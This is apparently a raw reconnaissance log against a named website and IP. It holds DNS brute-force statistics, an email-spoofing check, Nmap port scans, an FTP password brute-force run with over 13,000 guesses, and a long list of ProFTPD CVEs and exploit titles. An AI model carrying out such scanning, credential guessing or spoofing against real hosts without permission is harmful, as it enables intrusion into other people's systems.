2030Failures: 0: 17.94%, 1: 27.22%, 2: 24.40%, 3: 14.60%, 4: 7.30%, 5: 4.07%, 6: 1.98%, 7: 1.36%, 8: 0.63%, 9: 0.31%, 10: 0.10%, 11: 0.05%, 12: 0.00%, 13: 0.00%, 14: 0.05%, 15: 0.00%, 16: 0.00%, 17: 0.00%, 18: 0.00%, 19: 0.00%, 20: 0.00%, 21: 0.00%, 22: 0.00%, 23: 0.00%, 24: 0.00%, 25: 0.00%, 26: 0.00%, 27: 0.00%, 28: 0.00%, 29: 0.00%, 30: 0.00%, 31: 0.00%, 32: 0.00%, 33: 0.00%, 34: 0.00%, 35: 0.00%, 36: 0.00%, 37: 0.00%, 38: 0.00%, 39: 0.00%, 40: 0.00%, 41: 0.00%, 42: 0.00%, 43: 0.05%, 44: 0.00%, 45: 0.00%, 46: 0.00%, 47: 0.00%, 48: 0.00%, 49: 0.00%, 50: 0.00%,
2031Response: | Success: | Total:
2032OK: | 161 ( 8.39%) | 176 ( 5.82%)
2033NXDOMAIN: | 1714 ( 89.36%) | 1983 ( 65.60%)
2034SERVFAIL: | 43 ( 2.24%) | 58 ( 1.92%)
2035REFUSED: | 0 ( 0.00%) | 805 ( 26.63%)
2036FORMERR: | 0 ( 0.00%) | 0 ( 0.00%)
2037
2038
2039
2040Processed queries: 1919
2041Received packets: 3037
2042Progress: 100.00% (00 h 00 min 23 sec / 00 h 00 min 23 sec)
2043Current incoming rate: 0 pps, average: 131 pps
2044Current success rate: 0 pps, average: 83 pps
2045Finished total: 1918, success: 1918 (100.00%)
2046Mismatched domains: 380 (12.57%), IDs: 0 (0.00%)
2047Failures: 0: 17.94%, 1: 27.22%, 2: 24.40%, 3: 14.60%, 4: 7.30%, 5: 4.07%, 6: 1.98%, 7: 1.36%, 8: 0.63%, 9: 0.31%, 10: 0.10%, 11: 0.05%, 12: 0.00%, 13: 0.00%, 14: 0.05%, 15: 0.00%, 16: 0.00%, 17: 0.00%, 18: 0.00%, 19: 0.00%, 20: 0.00%, 21: 0.00%, 22: 0.00%, 23: 0.00%, 24: 0.00%, 25: 0.00%, 26: 0.00%, 27: 0.00%, 28: 0.00%, 29: 0.00%, 30: 0.00%, 31: 0.00%, 32: 0.00%, 33: 0.00%, 34: 0.00%, 35: 0.00%, 36: 0.00%, 37: 0.00%, 38: 0.00%, 39: 0.00%, 40: 0.00%, 41: 0.00%, 42: 0.00%, 43: 0.00%, 44: 0.00%, 45: 0.05%, 46: 0.00%, 47: 0.00%, 48: 0.00%, 49: 0.00%, 50: 0.00%,
2048Response: | Success: | Total:
2049OK: | 161 ( 8.39%) | 176 ( 5.82%)
2050NXDOMAIN: | 1714 ( 89.36%) | 1983 ( 65.58%)
2051SERVFAIL: | 43 ( 2.24%) | 58 ( 1.92%)
2052REFUSED: | 0 ( 0.00%) | 806 ( 26.65%)
2053FORMERR: | 0 ( 0.00%) | 0 ( 0.00%)
2054
2055
2056
2057Processed queries: 1919
2058Received packets: 3038
2059Progress: 100.00% (00 h 00 min 24 sec / 00 h 00 min 24 sec)
2060Current incoming rate: 0 pps, average: 126 pps
2061Current success rate: 0 pps, average: 79 pps
2062Finished total: 1918, success: 1918 (100.00%)
2063Mismatched domains: 381 (12.60%), IDs: 0 (0.00%)
2064Failures: 0: 17.94%, 1: 27.22%, 2: 24.40%, 3: 14.60%, 4: 7.30%, 5: 4.07%, 6: 1.98%, 7: 1.36%, 8: 0.63%, 9: 0.31%, 10: 0.10%, 11: 0.05%, 12: 0.00%, 13: 0.00%, 14: 0.05%, 15: 0.00%, 16: 0.00%, 17: 0.00%, 18: 0.00%, 19: 0.00%, 20: 0.00%, 21: 0.00%, 22: 0.00%, 23: 0.00%, 24: 0.00%, 25: 0.00%, 26: 0.00%, 27: 0.00%, 28: 0.00%, 29: 0.00%, 30: 0.00%, 31: 0.00%, 32: 0.00%, 33: 0.00%, 34: 0.00%, 35: 0.00%, 36: 0.00%, 37: 0.00%, 38: 0.00%, 39: 0.00%, 40: 0.00%, 41: 0.00%, 42: 0.00%, 43: 0.00%, 44: 0.00%, 45: 0.00%, 46: 0.00%, 47: 0.05%, 48: 0.00%, 49: 0.00%, 50: 0.00%,
2065Response: | Success: | Total:
2066OK: | 161 ( 8.39%) | 176 ( 5.82%)
2067NXDOMAIN: | 1714 ( 89.36%) | 1983 ( 65.55%)
2068SERVFAIL: | 43 ( 2.24%) | 58 ( 1.92%)
2069REFUSED: | 0 ( 0.00%) | 807 ( 26.68%)
2070FORMERR: | 0 ( 0.00%) | 0 ( 0.00%)
2071
2072
2073
2074Processed queries: 1919
2075Received packets: 3041
2076Progress: 100.00% (00 h 00 min 25 sec / 00 h 00 min 25 sec)
2077Current incoming rate: 2 pps, average: 121 pps
2078Current success rate: 0 pps, average: 76 pps
2079Finished total: 1918, success: 1918 (100.00%)
2080Mismatched domains: 384 (12.68%), IDs: 0 (0.00%)
2081Failures: 0: 17.94%, 1: 27.22%, 2: 24.40%, 3: 14.60%, 4: 7.30%, 5: 4.07%, 6: 1.98%, 7: 1.36%, 8: 0.63%, 9: 0.31%, 10: 0.10%, 11: 0.05%, 12: 0.00%, 13: 0.00%, 14: 0.05%, 15: 0.00%, 16: 0.00%, 17: 0.00%, 18: 0.00%, 19: 0.00%, 20: 0.00%, 21: 0.00%, 22: 0.00%, 23: 0.00%, 24: 0.00%, 25: 0.00%, 26: 0.00%, 27: 0.00%, 28: 0.00%, 29: 0.00%, 30: 0.00%, 31: 0.00%, 32: 0.00%, 33: 0.00%, 34: 0.00%, 35: 0.00%, 36: 0.00%, 37: 0.00%, 38: 0.00%, 39: 0.00%, 40: 0.00%, 41: 0.00%, 42: 0.00%, 43: 0.00%, 44: 0.00%, 45: 0.00%, 46: 0.00%, 47: 0.00%, 48: 0.00%, 49: 0.05%, 50: 0.00%,
2082Response: | Success: | Total:
2083OK: | 161 ( 8.39%) | 176 ( 5.81%)
2084NXDOMAIN: | 1714 ( 89.36%) | 1983 ( 65.49%)
2085SERVFAIL: | 43 ( 2.24%) | 58 ( 1.92%)
2086REFUSED: | 0 ( 0.00%) | 810 ( 26.75%)
2087FORMERR: | 0 ( 0.00%) | 0 ( 0.00%)
2088
2089
2090
2091Processed queries: 1919
2092Received packets: 3041
2093Progress: 100.00% (00 h 00 min 25 sec / 00 h 00 min 25 sec)
2094Current incoming rate: 0 pps, average: 121 pps
2095Current success rate: 0 pps, average: 76 pps
2096Finished total: 1919, success: 1918 (99.95%)
2097Mismatched domains: 384 (12.68%), IDs: 0 (0.00%)
2098Failures: 0: 17.93%, 1: 27.20%, 2: 24.39%, 3: 14.59%, 4: 7.30%, 5: 4.06%, 6: 1.98%, 7: 1.35%, 8: 0.63%, 9: 0.31%, 10: 0.10%, 11: 0.05%, 12: 0.00%, 13: 0.00%, 14: 0.05%, 15: 0.00%, 16: 0.00%, 17: 0.00%, 18: 0.00%, 19: 0.00%, 20: 0.00%, 21: 0.00%, 22: 0.00%, 23: 0.00%, 24: 0.00%, 25: 0.00%, 26: 0.00%, 27: 0.00%, 28: 0.00%, 29: 0.00%, 30: 0.00%, 31: 0.00%, 32: 0.00%, 33: 0.00%, 34: 0.00%, 35: 0.00%, 36: 0.00%, 37: 0.00%, 38: 0.00%, 39: 0.00%, 40: 0.00%, 41: 0.00%, 42: 0.00%, 43: 0.00%, 44: 0.00%, 45: 0.00%, 46: 0.00%, 47: 0.00%, 48: 0.00%, 49: 0.00%, 50: 0.05%,
2099Response: | Success: | Total:
2100OK: | 161 ( 8.39%) | 176 ( 5.81%)
2101NXDOMAIN: | 1714 ( 89.36%) | 1983 ( 65.49%)
2102SERVFAIL: | 43 ( 2.24%) | 58 ( 1.92%)
2103REFUSED: | 0 ( 0.00%) | 810 ( 26.75%)
2104FORMERR: | 0 ( 0.00%) | 0 ( 0.00%)
2105www.gpdg.org
210692.39.247.11
2107#######################################################################################################################################
2108[+] www.gpdg.org has no SPF record!
2109[*] No DMARC record found. Looking for organizational record
2110[+] No organizational DMARC record
2111[+] Spoofing possible for www.gpdg.org!
2112#######################################################################################################################################
2113WARNING: Duplicate port number(s) specified. Are you alert enough to be using Nmap? Have some coffee or Jolt(tm).
2114Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-25 11:27 EST
2115Nmap scan report for www.gpdg.org (92.39.247.11)
2116Host is up (0.18s latency).
2117rDNS record for 92.39.247.11: vps2330-cloud.sd-france.net
2118Not shown: 456 filtered ports, 28 closed ports
2119Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
2120PORT STATE SERVICE
212121/tcp open ftp
212222/tcp open ssh
212353/tcp open domain
212480/tcp open http
2125110/tcp open pop3
2126143/tcp open imap
2127443/tcp open https
2128465/tcp open smtps
2129993/tcp open imaps
2130995/tcp open pop3s
21318443/tcp open https-alt
21328880/tcp open cddbp-alt
2133
2134Nmap done: 1 IP address (1 host up) scanned in 4.94 seconds
2135#######################################################################################################################################
2136Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-25 11:27 EST
2137Nmap scan report for www.gpdg.org (92.39.247.11)
2138Host is up (0.14s latency).
2139rDNS record for 92.39.247.11: vps2330-cloud.sd-france.net
2140Not shown: 2 filtered ports
2141PORT STATE SERVICE
214253/udp open domain
214367/udp open|filtered dhcps
214468/udp open|filtered dhcpc
214569/udp open|filtered tftp
214688/udp open|filtered kerberos-sec
2147123/udp open|filtered ntp
2148139/udp open|filtered netbios-ssn
2149161/udp open|filtered snmp
2150162/udp open|filtered snmptrap
2151389/udp open|filtered ldap
2152500/udp open|filtered isakmp
2153520/udp open|filtered route
21542049/udp open|filtered nfs
2155
2156Nmap done: 1 IP address (1 host up) scanned in 2.41 seconds
2157#######################################################################################################################################
2158Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-25 11:27 EST
2159NSE: [ftp-brute] usernames: Time limit 10m00s exceeded.
2160NSE: [ftp-brute] usernames: Time limit 10m00s exceeded.
2161NSE: [ftp-brute] passwords: Time limit 10m00s exceeded.
2162Nmap scan report for www.gpdg.org (92.39.247.11)
2163Host is up (0.18s latency).
2164rDNS record for 92.39.247.11: vps2330-cloud.sd-france.net
2165
2166PORT STATE SERVICE VERSION
216721/tcp open ftp ProFTPD
2168| ftp-brute:
2169| Accounts: No valid accounts found
2170|_ Statistics: Performed 13346 guesses in 601 seconds, average tps: 21.4
2171| vulscan: VulDB - https://vuldb.com:
2172| [138380] ProFTPD 1.3.5b mod_copy Code Execution
2173| [81624] ProFTPD up to 1.3.5a/1.3.6rc1 mod_tls mod_tls.c weak encryption
2174| [75436] ProFTPD 1.3.4e/1.3.5 mod_copy File privilege escalation
2175| [10259] ProFTPD 1.3.4/1.3.5 mod_sftp/mod_sftp_pam kbdint.c resp_count denial of service
2176| [7244] ProFTPD up to 1.3.4 MKD/XMKD Command race condition
2177| [59589] ProFTPD up to 1.3.3 Use-After-Free memory corruption
2178| [4290] ProFTPD up to 1.3.3 mod_sftpd Big Payload denial of service
2179| [56304] ProFTPD up to 1.3.3 contrib/mod_sql.c) sql_prepare_where memory corruption
2180| [56042] GNU C Library up to 2.12.2 proftpd.gnu.c denial of service
2181| [56041] GNU C Library up to 2.12.2 proftpd.gnu.c denial of service
2182| [55410] ProFTPD 1.3.2/1.3.3 Telnet netio.c pr_netio_telnet_gets memory corruption
2183| [55403] ProFTPD 1.2.10/1.3.0/1.3.1/1.3.2/1.3.3 mod_site_misc Symlink directory traversal
2184| [55392] ProFTPD up to 1.3.2 pr_data_xfer denial of service
2185| [50631] ProFTPD 1.3.1/1.3.2/1.3.3 mod_tls unknown vulnerability
2186| [46500] ProFTPD 1.3.1 mod_sql_mysql sql injection
2187| [46499] ProFTPD 1.3.1/1.3.2/1.3.2 Rc2 mod_sql sql injection
2188| [44191] ProFTPD 1.3.1 FTP Command cross site request forgery
2189| [36309] ProFTPD 1.3.0 Rc1 mod_sql Plaintext unknown vulnerability
2190| [2747] ProFTPD 1.3.0/1.3.0a mod_ctrls pr_ctrls_recv_request memory corruption
2191| [33495] ProFTPD 1.3.0a Configuration File affected denial of service
2192| [2711] ProFTPD 1.3.0a mod_tls tls_x509_name_oneline memory corruption
2193| [2705] ProFTPD 1.3.0 main.c CommandBufferSize denial of service
2194|
2195| MITRE CVE - https://cve.mitre.org:
2196| [CVE-2012-6095] ProFTPD before 1.3.5rc1, when using the UserOwner directive, allows local users to modify the ownership of arbitrary files via a race condition and a symlink attack on the (1) MKD or (2) XMKD commands.
2197| [CVE-2011-4130] Use-after-free vulnerability in the Response API in ProFTPD before 1.3.3g allows remote authenticated users to execute arbitrary code via vectors involving an error that occurs after an FTP data transfer.
2198| [CVE-2011-1137] Integer overflow in the mod_sftp (aka SFTP) module in ProFTPD 1.3.3d and earlier allows remote attackers to cause a denial of service (memory consumption leading to OOM kill) via a malformed SSH message.
2199| [CVE-2010-4652] Heap-based buffer overflow in the sql_prepare_where function (contrib/mod_sql.c) in ProFTPD before 1.3.3d, when mod_sql is enabled, allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a crafted username containing substitution tags, which are not properly handled during construction of an SQL query.
2200| [CVE-2010-4562] Microsoft Windows 2008, 7, Vista, 2003, 2000, and XP, when using IPv6, allows remote attackers to determine whether a host is sniffing the network by sending an ICMPv6 Echo Request to a multicast address and determining whether an Echo Reply is sent, as demonstrated by thcping. NOTE: due to a typo, some sources map CVE-2010-4562 to a ProFTPd mod_sql vulnerability, but that issue is covered by CVE-2010-4652.
2201| [CVE-2010-4221] Multiple stack-based buffer overflows in the pr_netio_telnet_gets function in netio.c in ProFTPD before 1.3.3c allow remote attackers to execute arbitrary code via vectors involving a TELNET IAC escape character to a (1) FTP or (2) FTPS server.
2202| [CVE-2010-4052] Stack consumption vulnerability in the regcomp implementation in the GNU C Library (aka glibc or libc6) through 2.11.3, and 2.12.x through 2.12.2, allows context-dependent attackers to cause a denial of service (resource exhaustion) via a regular expression containing adjacent repetition operators, as demonstrated by a {10,}{10,}{10,}{10,} sequence in the proftpd.gnu.c exploit for ProFTPD.
2203| [CVE-2010-4051] The regcomp implementation in the GNU C Library (aka glibc or libc6) through 2.11.3, and 2.12.x through 2.12.2, allows context-dependent attackers to cause a denial of service (application crash) via a regular expression containing adjacent bounded repetitions that bypass the intended RE_DUP_MAX limitation, as demonstrated by a {10,}{10,}{10,}{10,}{10,} sequence in the proftpd.gnu.c exploit for ProFTPD, related to a "RE_DUP_MAX overflow."
2204| [CVE-2010-3867] Multiple directory traversal vulnerabilities in the mod_site_misc module in ProFTPD before 1.3.3c allow remote authenticated users to create directories, delete directories, create symlinks, and modify file timestamps via directory traversal sequences in a (1) SITE MKDIR, (2) SITE RMDIR, (3) SITE SYMLINK, or (4) SITE UTIME command.
2205| [CVE-2009-3639] The mod_tls module in ProFTPD before 1.3.2b, and 1.3.3 before 1.3.3rc2, when the dNSNameRequired TLS option is enabled, does not properly handle a '\0' character in a domain name in the Subject Alternative Name field of an X.509 client certificate, which allows remote attackers to bypass intended client-hostname restrictions via a crafted certificate issued by a legitimate Certification Authority, a related issue to CVE-2009-2408.
2206| [CVE-2009-0919] XAMPP installs multiple packages with insecure default passwords, which makes it easier for remote attackers to obtain access via (1) the "lampp" default password for the "nobody" account within the included ProFTPD installation, (2) a blank default password for the "root" account within the included MySQL installation, (3) a blank default password for the "pma" account within the phpMyAdmin installation, and possibly other unspecified passwords. NOTE: this was originally reported as a problem in DFLabs PTK, but this issue affects any product that is installed within the XAMPP environment, and should not be viewed as a vulnerability within that product. NOTE: DFLabs states that PTK is intended for use in a laboratory with "no contact from / to internet."
2207| [CVE-2009-0543] ProFTPD Server 1.3.1, with NLS support enabled, allows remote attackers to bypass SQL injection protection mechanisms via invalid, encoded multibyte characters, which are not properly handled in (1) mod_sql_mysql and (2) mod_sql_postgres.
2208| [CVE-2009-0542] SQL injection vulnerability in ProFTPD Server 1.3.1 through 1.3.2rc2 allows remote attackers to execute arbitrary SQL commands via a "%" (percent) character in the username, which introduces a "'" (single quote) character during variable substitution by mod_sql.
2209| [CVE-2008-7265] The pr_data_xfer function in ProFTPD before 1.3.2rc3 allows remote authenticated users to cause a denial of service (CPU consumption) via an ABOR command during a data transfer.
2210| [CVE-2008-4242] ProFTPD 1.3.1 interprets long commands from an FTP client as multiple commands, which allows remote attackers to conduct cross-site request forgery (CSRF) attacks and execute arbitrary FTP commands via a long ftp:// URI that leverages an existing session from the FTP client implementation in a web browser.
2211| [CVE-2007-2165] The Auth API in ProFTPD before 20070417, when multiple simultaneous authentication modules are configured, does not require that the module that checks authentication is the same as the module that retrieves authentication data, which might allow remote attackers to bypass authentication, as demonstrated by use of SQLAuthTypes Plaintext in mod_sql, with data retrieved from /etc/passwd.
2212| [CVE-2006-6563] Stack-based buffer overflow in the pr_ctrls_recv_request function in ctrls.c in the mod_ctrls module in ProFTPD before 1.3.1rc1 allows local users to execute arbitrary code via a large reqarglen length value.
2213| [CVE-2006-6171] ** DISPUTED ** ProFTPD 1.3.0a and earlier does not properly set the buffer size limit when CommandBufferSize is specified in the configuration file, which leads to an off-by-two buffer underflow. NOTE: in November 2006, the role of CommandBufferSize was originally associated with CVE-2006-5815, but this was an error stemming from a vague initial disclosure. NOTE: ProFTPD developers dispute this issue, saying that the relevant memory location is overwritten by assignment before further use within the affected function, so this is not a vulnerability.
2214| [CVE-2006-6170] Buffer overflow in the tls_x509_name_oneline function in the mod_tls module, as used in ProFTPD 1.3.0a and earlier, and possibly other products, allows remote attackers to execute arbitrary code via a large data length argument, a different vulnerability than CVE-2006-5815.
2215| [CVE-2006-5815] Stack-based buffer overflow in the sreplace function in ProFTPD 1.3.0 and earlier allows remote attackers, probably authenticated, to cause a denial of service and execute arbitrary code, as demonstrated by vd_proftpd.pm, a "ProFTPD remote exploit."
2216| [CVE-2005-4816] Buffer overflow in mod_radius in ProFTPD before 1.3.0rc2 allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a long password.
2217| [CVE-2005-2390] Multiple format string vulnerabilities in ProFTPD before 1.3.0rc2 allow attackers to cause a denial of service or obtain sensitive information via (1) certain inputs to the shutdown message from ftpshut, or (2) the SQLShowInfo mod_sql directive.
2218| [CVE-2005-0484] Format string vulnerability in gprostats for GProFTPD before 8.1.9 may allow remote attackers to execute arbitrary code via an FTP transfer with a crafted filename that causes format string specifiers to be inserted into the ProFTPD transfer log.
2219| [CVE-2004-1602] ProFTPD 1.2.x, including 1.2.8 and 1.2.10, responds in a different amount of time when a given username exists, which allows remote attackers to identify valid usernames by timing the server response.
2220| [CVE-2004-0529] The modified suexec program in cPanel, when configured for mod_php and compiled for Apache 1.3.31 and earlier without mod_phpsuexec, allows local users to execute untrusted shared scripts and gain privileges, as demonstrated using untainted scripts such as (1) proftpdvhosts or (2) addalink.cgi, a different vulnerability than CVE-2004-0490.
2221| [CVE-2004-0432] ProFTPD 1.2.9 treats the Allow and Deny directives for CIDR based ACL entries as if they were AllowAll, which could allow FTP clients to bypass intended access restrictions.
2222| [CVE-2004-0346] Off-by-one buffer overflow in _xlate_ascii_write() in ProFTPD 1.2.7 through 1.2.9rc2p allows local users to gain privileges via a 1024 byte RETR command.
2223| [CVE-2003-0831] ProFTPD 1.2.7 through 1.2.9rc2 does not properly translate newline characters when transferring files in ASCII mode, which allows remote attackers to execute arbitrary code via a buffer overflow using certain files.
2224| [CVE-2003-0500] SQL injection vulnerability in the PostgreSQL authentication module (mod_sql_postgres) for ProFTPD before 1.2.9rc1 allows remote attackers to execute arbitrary SQL and gain privileges by bypassing authentication or stealing passwords via the USER name.
2225| [CVE-2001-1501] The glob functionality in ProFTPD 1.2.1, and possibly other versions allows remote attackers to cause a denial of service (CPU and memory consumption) via commands with large numbers of wildcard and other special characters, as demonstrated using an ls command with multiple (1) "*/..", (2) "*/.*", or (3) ".*./*?/" sequences in the argument.
2226| [CVE-2001-1500] ProFTPD 1.2.2rc2, and possibly other versions, does not properly verify reverse-resolved hostnames by performing forward resolution, which allows remote attackers to bypass ACLs or cause an incorrect client hostname to be logged.
2227| [CVE-2001-0456] postinst installation script for Proftpd in Debian 2.2 does not properly change the "run as uid/gid root" configuration when the user enables anonymous access, which causes the server to run at a higher privilege than intended.
2228| [CVE-2001-0318] Format string vulnerability in ProFTPD 1.2.0rc2 may allow attackers to execute arbitrary commands by shutting down the FTP server while using a malformed working directory (cwd).
2229| [CVE-2001-0136] Memory leak in ProFTPd 1.2.0rc2 allows remote attackers to cause a denial of service via a series of USER commands, and possibly SIZE commands if the server has been improperly installed.
2230| [CVE-2001-0027] mod_sqlpw module in ProFTPD does not reset a cached password when a user uses the "user" command to change accounts, which allows authenticated attackers to gain privileges of other users.
2231| [CVE-2000-0574] FTP servers such as OpenBSD ftpd, NetBSD ftpd, ProFTPd and Opieftpd do not properly cleanse untrusted format strings that are used in the setproctitle function (sometimes called by set_proc_title), which allows remote attackers to cause a denial of service or execute arbitrary commands.
2232| [CVE-1999-1475] ProFTPd 1.2 compiled with the mod_sqlpw module records user passwords in the wtmp log file, which allows local users to obtain the passwords and gain privileges by reading wtmp, e.g. via the last command.
2233| [CVE-1999-0911] Buffer overflow in ProFTPD, wu-ftpd, and beroftpd allows remote attackers to gain root access via a series of MKD and CWD commands that create nested directories.
2234| [CVE-1999-0368] Buffer overflows in wuarchive ftpd (wu-ftpd) and ProFTPD lead to remote root access, a.k.a. palmetto.
2235|
2236| SecurityFocus - https://www.securityfocus.com/bid/:
2237| [97409] ProFTPD CVE-2017-7418 Local Security Bypass Vulnerability
2238| [89750] ProFTPD CVE-2001-1501 Denial-Of-Service Vulnerability
2239| [88575] ProFTPD CVE-2001-0027 Denial-Of-Service Vulnerability
2240| [84378] Proftpd CVE-2008-7265 Denial-Of-Service Vulnerability
2241| [84329] ProFTPD Out Of Bounds Multiple Memory Corruption Vulnerabilities
2242| [84327] ProFTPD CVE-2016-3125 Diffie Hellman Key Exchange Security Bypass Vulnerability
2243| [82756] ProFTPD CVE-2003-0500 SQL-Injection Vulnerability
2244| [82433] GProFTPD CVE-2005-0484 Remote Security Vulnerability
2245| [77684] ProFTPD Heap Buffer Overflow and Denial of Service Vulnerabilities
2246| [74238] ProFTPD CVE-2015-3306 Information Disclosure Vulnerabilities
2247| [62328] ProFTPD 'mod_sftp_pam' Remote Denial of Service Vulnerability
2248| [57172] ProFTPD Race Condition Local Privilege Escalation Vulnerability
2249| [50631] ProFTPD Prior To 1.3.3g Use-After-Free Remote Code Execution Vulnerability
2250| [46183] ProFTPD 'mod_sftp' Module Integer Overflow Vulnerability
2251| [45150] ProFTPD Backdoor Unauthorized Access Vulnerability
2252| [44933] ProFTPD 'mod_sql' Remote Heap Based Buffer Overflow Vulnerability
2253| [44562] ProFTPD Multiple Remote Vulnerabilities
2254| [36804] ProFTPD mod_tls Module NULL Character CA SSL Certificate Validation Security Bypass Vulnerability
2255| [33722] ProFTPD 'mod_sql' Username SQL Injection Vulnerability
2256| [33650] ProFTPD Character Encoding SQL Injection Vulnerability
2257| [23546] ProFTPD AUTH Multiple Authentication Module Security Bypass Vulnerability
2258| [21587] ProFTPD Controls Module Local Buffer Overflow Vulnerability
2259| [21326] ProFTPD MOD_TLS Remote Buffer Overflow Vulnerability
2260| [20992] ProFTPD SReplace Remote Buffer Overflow Vulnerability
2261| [16535] ProFTPD Mod_Radius Buffer Overflow Vulnerability
2262| [14381] ProFTPD Shutdown Message Format String Vulnerability
2263| [14380] ProFTPD SQLShowInfo SQL Output Format String Vulnerability
2264| [12588] GProFTPD GProstats Remote Format String Vulnerability
2265| [11430] ProFTPD Authentication Delay Username Enumeration Vulnerability
2266| [10252] ProFTPD CIDR Access Control Rule Bypass Vulnerability
2267| [9782] ProFTPD _xlate_ascii_write() Buffer Overrun Vulnerability
2268| [8679] ProFTPD ASCII File Transfer Buffer Overrun Vulnerability
2269| [7974] ProFTPD SQL Injection mod_sql Vulnerability
2270| [6781] ProFTPD 1.2.0rc2 log_pri() Format String Vulnerability
2271| [6341] ProFTPD STAT Command Denial Of Service Vulnerability
2272| [3310] ProFTPD Client Hostname Resolving Vulnerability
2273| [2366] ProFTPD USER Remote Denial of Service Vulnerability
2274| [2185] ProFTPD SIZE Remote Denial of Service Vulnerability
2275| [812] ProFTPD mod_sqlpw Vulnerability
2276| [650] ProFTPD snprintf Vulnerability
2277| [612] ProFTPD Remote Buffer Overflow
2278|
2279| IBM X-Force - https://exchange.xforce.ibmcloud.com:
2280| [80980] ProFTPD FTP commands symlink
2281| [71226] ProFTPD pool code execution
2282| [65207] ProFTPD mod_sftp module denial of service
2283| [64495] ProFTPD sql_prepare_where() buffer overflow
2284| [63658] ProFTPD FTP server backdoor
2285| [63407] mod_sql module for ProFTPD buffer overflow
2286| [63155] ProFTPD pr_data_xfer denial of service
2287| [62909] ProFTPD mod_site_misc directory traversal
2288| [62908] ProFTPD pr_netio_telnet_gets() buffer overflow
2289| [53936] ProFTPD mod_tls SSL certificate security bypass
2290| [48951] ProFTPD mod_sql username percent SQL injection
2291| [48558] ProFTPD NLS support SQL injection protection bypass
2292| [45274] ProFTPD URL cross-site request forgery
2293| [33733] ProFTPD Auth API security bypass
2294| [31461] ProFTPD mod_radius buffer overflow
2295| [30906] ProFTPD Controls (mod_ctrls) module buffer overflow
2296| [30554] ProFTPD mod_tls module tls_x509_name_oneline() buffer overflow
2297| [30147] ProFTPD sreplace() buffer overflow
2298| [21530] ProFTPD mod_sql format string attack
2299| [21528] ProFTPD shutdown message format string attack
2300| [19410] GProFTPD file name format string attack
2301| [18453] ProFTPD SITE CHGRP command allows group ownership modification
2302| [17724] ProFTPD could allow an attacker to obtain valid accounts
2303| [16038] ProFTPD CIDR entry ACL bypass
2304| [15387] ProFTPD off-by-one _xlate_ascii_write function buffer overflow
2305| [12369] ProFTPD mod_sql SQL injection
2306| [12200] ProFTPD ASCII file newline buffer overflow
2307| [10932] ProFTPD long PASS command buffer overflow
2308| [8332] ProFTPD mod_sqlpw stores passwords in the wtmp log file
2309| [7818] ProFTPD ls "
2310| [7816] ProFTPD file globbing denial of service
2311| [7126] ProFTPD fails to resolve hostnames
2312| [6433] ProFTPD format string
2313| [6209] proFTPD /var symlink
2314| [6208] ProFTPD contains configuration error in postinst script when running as root
2315| [5801] proftpd memory leak when using SIZE or USER commands
2316| [5737] ProFTPD system using mod_sqlpw unauthorized access
2317|
2318| Exploit-DB - https://www.exploit-db.com:
2319| [23170] ProFTPD 1.2.7/1.2.8 ASCII File Transfer Buffer Overrun Vulnerability
2320| [22079] ProFTPD 1.2.x STAT Command Denial of Service Vulnerability
2321| [20690] wu-ftpd 2.4/2.5/2.6,Trolltech ftpd 1.2,ProFTPD 1.2,BeroFTPD 1.3.4 FTP glob Expansion Vulnerability
2322| [20536] ProFTPD 1.2 SIZE Remote Denial of Service Vulnerability
2323| [19503] ProFTPD 1.2 pre6 snprintf Vulnerability
2324| [19476] ProFTPD 1.2 pre1/pre2/pre3/pre4/pre5 Remote Buffer Overflow (2)
2325| [19475] ProFTPD 1.2 pre1/pre2/pre3/pre4/pre5 Remote Buffer Overflow (1)
2326| [19087] wu-ftpd 2.4.2,SCO Open Server <= 5.0.5,ProFTPD 1.2 pre1 realpath Vulnerability (2)
2327| [19086] wu-ftpd 2.4.2,SCO Open Server <= 5.0.5,ProFTPD 1.2 pre1 realpath Vulnerability (1)
2328| [18181] FreeBSD ftpd and ProFTPd on FreeBSD Remote r00t Exploit
2329| [16921] ProFTPD-1.3.3c Backdoor Command Execution
2330| [16878] ProFTPD 1.3.2rc3 - 1.3.3b Telnet IAC Buffer Overflow (FreeBSD)
2331| [16852] ProFTPD 1.2 - 1.3.0 sreplace Buffer Overflow (Linux)
2332| [16851] ProFTPD 1.3.2rc3 - 1.3.3b Telnet IAC Buffer Overflow (Linux)
2333| [16129] ProFTPD mod_sftp Integer Overflow DoS PoC
2334| [15662] ProFTPD 1.3.3c compromised source remote root Trojan
2335| [15449] ProFTPD IAC Remote Root Exploit
2336| [10044] ProFTPd 1.3.0 mod_ctrls Local Stack Overflow (opensuse)
2337| [8037] ProFTPd with mod_mysql Authentication Bypass Vulnerability
2338| [4312] ProFTPD 1.x (module mod_tls) Remote Buffer Overflow Exploit
2339| [3730] ProFTPD 1.3.0/1.3.0a (mod_ctrls) Local Overflow Exploit (exec-shield)
2340| [3333] ProFTPD 1.3.0/1.3.0a (mod_ctrls support) Local Buffer Overflow Exploit 2
2341| [3330] ProFTPD 1.3.0/1.3.0a (mod_ctrls support) Local Buffer Overflow Exploit
2342| [3021] ProFTPD <= 1.2.9 rc2 (ASCII File) Remote Root Exploit
2343| [2928] ProFTPD <= 1.3.0a (mod_ctrls support) Local Buffer Overflow PoC
2344| [2856] ProFTPD 1.3.0 (sreplace) Remote Stack Overflow Exploit (meta)
2345| [581] ProFTPD <= 1.2.10 Remote Users Enumeration Exploit
2346| [394] ProFTPd Local pr_ctrls_connect Vulnerability - ftpdctl
2347| [244] ProFTPD <= 1.2.0pre10 Remote Denial of Service Exploit
2348| [241] ProFTPD 1.2.0 (rc2) - memory leakage example Exploit
2349| [110] ProFTPD 1.2.7 - 1.2.9rc2 Remote Root & brute-force Exploit
2350| [107] ProFTPD 1.2.9rc2 ASCII File Remote Root Exploit
2351| [43] ProFTPD 1.2.9RC1 (mod_sql) Remote SQL Injection Exploit
2352|
2353| OpenVAS (Nessus) - http://www.openvas.org:
2354| [900815] ProFTPD Server Remote Version Detection
2355| [900507] ProFTPD Server SQL Injection Vulnerability
2356| [900506] ProFTPD Server Version Detection
2357| [900133] ProFTPD Long Command Handling Security Vulnerability
2358| [863897] Fedora Update for proftpd FEDORA-2011-15765
2359| [863633] Fedora Update for proftpd FEDORA-2011-15741
2360| [863630] Fedora Update for proftpd FEDORA-2011-15740
